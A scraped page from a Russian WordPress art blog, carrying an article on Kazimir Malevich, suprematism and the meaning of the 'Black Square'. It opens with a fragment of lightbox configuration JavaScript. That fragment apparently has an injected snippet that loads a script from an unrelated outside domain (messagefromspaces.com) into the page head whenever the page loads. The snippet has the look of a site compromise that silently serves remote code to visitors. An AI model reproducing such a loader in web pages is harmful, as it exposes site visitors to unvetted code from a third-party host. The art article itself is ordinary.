, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Казимир Северинович Малевич

Автор: Дмитрий Алмазов | 19 Сен 2012

Казимир Северинович Малевич . СупрематизмОсновоположником супрематизма (от лат. supremus – наивысший) является Казимир Северинович Малевич (1878-1935). Ученик Киевской художественной школы, Московского училища живописи, ваяния и зодчества. Стремясь избежать обыденности и заурядности, художник проделал немалый путь в своих творческих поисках, совершенствуя свое мастерство, он увлекался импрессионизмом, кубизмом, футуризмом, и эпоха способствовало этому.

В декабре 1915 г. в Петербурге публике была представлена картина «Черный квадрат", где контрастным цветом обозначены противоположные понятия: свет и тьма, жизнь и смерть, космос и хаос.

Мрачный, светопоглощающий цвет является главным образом, ассоциируется с адом, гибелью, мучениями. Именно темному автор отдает предпочтение. Белое играет роль обрамления и оттеснено на периферию, мрак пытается вытеснить светлое, пожирая все пространство. Если долго и пристально смотреть на изображение появляется ощущение, что ты стоишь перед зияющим проемом бездны, которая засасывает тебя, и ты можешь исчезнуть в ней через минуту. Да и сам живописец считал, что на этом шедевре  искусство заканчивается.

Следует понимать особенности исторического периода написания полотна: кровавые войны, убийства, предчувствие надвигающейся катастрофы, человек кажется пылинкой  во вселенной.

Поэтому для многих и особенно для создателя "Черный квадрат" был не только символом конца искусства, но и жизни. И из обломков старого мира должна была возродиться новая, чистая и прекрасная страница истории.

30-е годы Малевич оставляет абстракционизм, возвращается традиционному реализму. Авангардистские идеи не исчезли, не канули в Лету, они повлияли на развитие конструктивизма, применялись в архитектуре, в промышленной эстетике, что позднее назовут дизайном. В абстрактном стиле декорировали посуду, одежду, в полиграфической продукции используют четкие графические композиции.

Принципы, которые были продемонстрированы в живописи начала ХХ века, опередили свое время. Их сегодня применяют рекламные фирмы, модельеры, дизайнеры интерьеров, сценографы, делая упор на чистоту оттенков и лаконизм форм, а художественные произведения Казимира Малевича высоко ценятся у нас в России и за  границей.

Автор Екатерина Похожаева

Темы: Изобразительное искусство, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress